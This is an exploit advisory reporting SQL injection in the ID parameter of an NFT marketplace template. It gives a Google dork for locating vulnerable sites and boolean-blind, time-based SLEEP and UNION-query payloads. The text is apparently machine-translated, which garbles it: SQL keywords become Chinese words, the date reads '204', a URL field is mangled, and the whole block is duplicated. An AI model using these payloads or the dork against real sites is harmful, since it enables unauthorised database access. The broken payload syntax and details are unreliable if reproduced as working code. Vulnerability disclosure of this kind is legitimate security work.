#利用标题: Xhibiter NFT Marketplace Sqli
#Google Dork: Intitle:'View-浏览,创建,购买,出售和审计NFTS'
#日期: 29/06/204
#漏洞作者: sohel yousef-https://www.linkedin.com/in/sohel-yousef-50a905189/
#供应商homepage3360 https://elements.envato.com/xhibiter-nft-Marketplace-html-template-aqn45fa
#版本: 1.10.2
#在: Linux上测试
#CVE : [如果适用,
在这个dir上
Xhibiter NFT市场遭受SQLI
---
参数: ID(GET)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句
payload: id=2'和4182=4182和'rnfd'='rnfd
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: ID=2'和(从(Select(Sleep(5)))HSLV)和'Keoa'='Keoa
type:联合查询
title: mysql联合查询(null)-36列
payload: id=2'联合全部选择null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Concat(0x7162626271,0x655 465754C50524D684F7649444444458624E4E596C614B6D4A566656F4956694666D4B70436666666B5 8,0x71716a6271),无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效
---
#Google Dork: Intitle:'View-浏览,创建,购买,出售和审计NFTS'
#日期: 29/06/204
#漏洞作者: sohel yousef-https://www.linkedin.com/in/sohel-yousef-50a905189/
#供应商homepage3360 https://elements.envato.com/xhibiter-nft-Marketplace-html-template-aqn45fa
#版本: 1.10.2
#在: Linux上测试
#CVE : [如果适用,
在这个dir上
正在加载...
localhost
---
参数: ID(GET)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句
payload: id=2'和4182=4182和'rnfd'='rnfd
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: ID=2'和(从(Select(Sleep(5)))HSLV)和'Keoa'='Keoa
type:联合查询
title: mysql联合查询(null)-36列
payload: id=2'联合全部选择null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Concat(0x7162626271,0x655 465754C50524D684F7649444444458624E4E596C614B6D4A566656F4956694666D4B70436666666B5 8,0x71716a6271),无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效,无效
---